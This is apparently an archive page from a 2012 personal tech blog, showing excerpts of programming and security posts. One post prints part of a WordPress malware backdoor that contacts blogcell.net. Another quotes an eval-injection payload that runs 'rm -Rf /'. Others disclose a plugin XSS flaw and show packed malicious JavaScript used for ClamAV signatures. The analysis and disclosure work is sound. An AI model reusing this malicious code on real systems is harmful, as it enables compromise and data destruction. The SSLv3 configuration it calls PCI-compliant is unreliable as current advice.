Posts

Showing posts from 2012

Symbolism

So I've devised a way to pragmatically draw my sign in code using the GD library in PHP. Copyright Markizano.NET, LLC. All rights reserved. As long as the dimensions are 2x3, the measurements should evolve appropriately. For example, if you start with an empty transparent 200x300, then it should look appropriate. Devised below: <?php header("X-Author: Markizano Draconus"); header("Content-Type: image/png"); # An empty canvas of an image. Just an empty, transparent PNG image. define("IMG", "Altrish.png"); $png = imagecreatefrompng(IMG); imagealphablending($png, false); imagesavealpha($png, true); $stat = new stdClass; $leftHyp = new stdClass; $rightHyp = new stdClass; $halfPy = new stdClass; $margin = 10; # 200, 300 list($stat->canvasWidth, $stat->canvasHeight) = getimagesize(IMG); $stat->width = $stat->canvasWidth - ($margin*2); # Image area width, adding padding from the edge. $stat->height = $stat->canvasHeight - (...

Perl Net::SSH2::SFTP Example

In my experiences, code has sometimes been better at explaining than documentation. Why did I do this? Because I didn't find it immediately when I searched for it... Cheers! Copy From PasteBin! #!/usr/bin/perl use strict; use warnings; use Data::Dumper; use Net::SSH2; use Net::SFTP; use Carp; use Fcntl; use Fcntl ':DEFAULT'; use constant SSH_USER => 'root'; use constant SSH_PASS => 'toor'; use constant SSH_HOST => 'localhost'; use constant SSH_PORT => 21; my ( $conn, $ssh, $sftp, $buf, $buffer, $len ); sub ssh_connect { my ( $ssh, $user, $host, $pass, $port ); ( $user, $pass, $host, $port ) = @_; $host ||= 'localhost'; $port ||= 22; $ssh = new Net::SSH2; $ssh->debug(1); $ssh->blocking(1); return 0 unless $ssh->connect($host . ':' . $port); print "[*] Connect OK!\n"; return 0 unless $ssh->auth( username => $user, password => $pass); print "[*] Auth OK!\n"; return $ssh; } sub...

Get Address of a Network Interface in C

So, here I am searching the internet over and over again to find out how to easily and quickly get the ip address of a local interface, and there isn't an easy way to do it without running `ifconfig | grep | cut...` in some crazy fashion. So, here I've compiled a simple C script that will iterate through your interfaces and get the IP address of a local network interface if you supply it on the command line. Feel free to redistribute under GNU. https://github.com/markizano/scripts/blob/master/getifaddr/getifaddr.c /* This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Gene...

Specific Exploits

Malicious crackers don't care who you are. They prey and feed on the fact that you think you're so meaningless that you'll never be targeted. I came across this one exploit that was really interesting. Someone went to some great lengths to get this poor victim. Code: function wp_get_footer_meta() { global $wpdb; if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'")) $adwb_opt = unserialize($adwb_opt); else { $adwb_opt = array( 0, '' ); $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '" . serialize($adwb_opt) . "', 'no')"); } if ((time() - $adwb_opt[0]) >= 3600) { $adwb_host = 'blogcell.net'; $adwb_get = '/wpam/'; $adwb_soc = @fsockopen($adwb_host, 80, $_en, $_es, 30); ...

Eval is Evil

Why? Because Kizano said so... Here are some examples I've seen in live code that just do not work (1-line each): $success = eval('?>' . $_GET['a']); eval("$my_obj->$key = $other_obj->$some_value"); I'm really surprised at some people. Do they not see the glaring a=<?php system("rm -Rf /"); in their URL ? Just keep things easy on yourself and use this instead: $success = (string)$_GET['a']; $my_obj->$key = $other_obj->$some_value; That way - you don't give me a heart attack when I see you vulnerable to the most basic PHP exploit... Remember, PHP is smart enough to do what you what, but the real question is are you l33t enough to write it? Eval is Evil! EOF

Wordpress Securepress Plugin Vulnerability

http://wordpress.org/extend/plugins/securepress-plugin/ While looking around in a Wordpress install, I found this little gem: line 2218: $back = isset($_POST['back']) ? $_POST['back'] : null; Line 2349: <input type="button" value="Cancel" onclick="eval(\'memos.\'+\''.addcslashes($back,"'").'\')" /> $back is never properly escaped for JS... They should use json_encode instead. I can inject arbitrary JavaScript into a post request for the "back" parameter and have it come out in your browser. Tested on plugin version 8.4.01. -0xKizano

apt-get update; GPG Unverified Signature

So, you added a new thing to your /etc/apt/sources.list (or if you're smarter than most, you'll create your own user-based file in /etc/apt/sources.list.d/<new-source>.list , then you go to update Aptitude, and you get the following message: root@localhost:~# apt-get update ... W: GPG error: http://updates.repository.backtrack-linux.org revolution Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY AB6DA34B475A6B7F This is all fine and dandy - I can just goto the site and look for their key and install that, right? No? They don't just give me the key?! Then your packages will always be unverified and I'll be open to an exploit that allows the install of arbitrary third-party packages! Oh noes! D: Whatever shall we do? Never fear - there's a way to get that key and turn it into something apt-get can use and stop complaining about that error. Checkout apt-get-key , which is a quick script that ...

Office View

Image
Here's the view I get from my office window: I love my job :3

ClamAV Signatures

Recently while working with ClamAV I encountered some cool features I wanted to share. Signatures Too Long In one instance, I found out that ClamAV cannot accept signatures greater than a certain length. While I'm not exactly sure what that length is, I'm sure you'll get a syntax error if the signature is too long. In another instance, I found that ClamAV does alright with heuristics. It may be a custom hack, but the gist of the matter is: I can input the arguments to a (function(p,a,c,k,e,r)) and only the arguments to the function, and ClamAV will detect the use of the function and will include the function in the normalized result. Example ('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g...

Sockets in C: Error 141?

So, I've been working with sockets in C recently and encountered an issue I didn't easily find a solution. Hopefully this blog can end up on the top of the results because it's the post that helps others out. Premise So, the idea here is I have a service running that accepts connections for data to process. I have it configured to open a socket, then for each user that connects, it will create a thread and pass the client to that thread as it opens the socket for another potential connection. The thread handles the processing of data that passes for that connection and then terminates. Now, what happens when a client prematurely disconnects from the thread before it's finished? It would appear your application just dies, no "segmentation fault", no output, it just dies. You may notice it has exit code 141. Problem Turns out what really was happening was the service was sending itself signal 13, or SIGPIPE. If either the service or the client attempts to send d...

Do You Fix Computers?

I often times get this question when I tell people that I work with computers. What's even more humorous is the number one complaint I see with most people is that it's slow... I usually proceed with the next question: how much RAM do you have on it? Which is usually followed by "wat?" With a blank stare, or they will proudly boast about how little they know about computers, as if it were an achievement. I wince as I ask the question "could you look on the box for this info?", which is followed up with "wat box?" At this point a faceplant is usually issued as I explain the concept of RAM and how to obtain this info. Since I've encountered a mass number if these questions and followed this conversation to no end, I think I'm going to change it up to avoid these questions and can get away with the excuse: "but... The Internet is much different from your computer...". My new answer will be: I make the Internet work ^.^

PCI Compliant Apache2 SSL Configuration

In recent trials, I have encountered a need to update the configuration for Apache to conform to PCI compliance. More information on Apache's configuration with SSL can be found here . The configuration you can use to have PCI-compliant SSL for Apache is: SSLProtocol -ALL +SSLv3 +TLSv1 SSLCipherSuite HIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3:!ADH Breakdown: "HIGH:MEDIUM": This will enable Apache for the seven strongest algorithms used for encryption. "+TLSv1": Enable TLS version 1 encryption. "!SSLv2": Disable the weaker SSL version 2 encryption. "+SSLv3": Enable the stronger SSL version 3 encryption. "!ADH": Disable the ADH versions of encryption, which are weaker algorithms.

Malware Signature Generation - Mid Trial

In recent research, I've discovered a few things about malware signature generation (MSG) and the whole model that surrounds it. Most of this is just speculation, which would explain the lack of citations. However, I would like to expand on what we have and create a smarter product. As I understand it, MSG is based on just understanding exploits that have been created and basically blacklisting and whitelisting code that has already been written. The problem is there is an infinite number of ways a task can be completed, so having a complete and inclusive list (or even a list up to date with the most recent hacks) is nearly impossible. With the plethora of technologies involved in a single web page request, that probability of having a fully inclusive list of exploits is even more stark. Last week, I had a theory that if one were to compile source code to bytecode or binary, then you could inspect the result of that to determine if similar plaintext code would have the same binary ...

Malware Signature Generation

In recent work, I've encountered a task where we are identifying malware based on a signature that is a snippet of code that performs the malicious activity. These are usually JavaScript- or PHP-based exploits that disable any local protections and transfer whatever data or payload to or from the client for further exploitation. The question is how to identify these snippets of code so we can take action to have it removed. I think it would not be the most efficient way to copy/paste the code into a database and check to see if you ever find that snippet again because the variable names could be changed, lines of code could be shifted around or even a different character set in the files would pretty much invalidate the signature on the last one found just like it. One higher priority question to me is: Will compiling PHP and JavaScript to bytecode, and generating signatures for the binary results be a more effective way of identifying malware than identifying copy/pasted snippets ...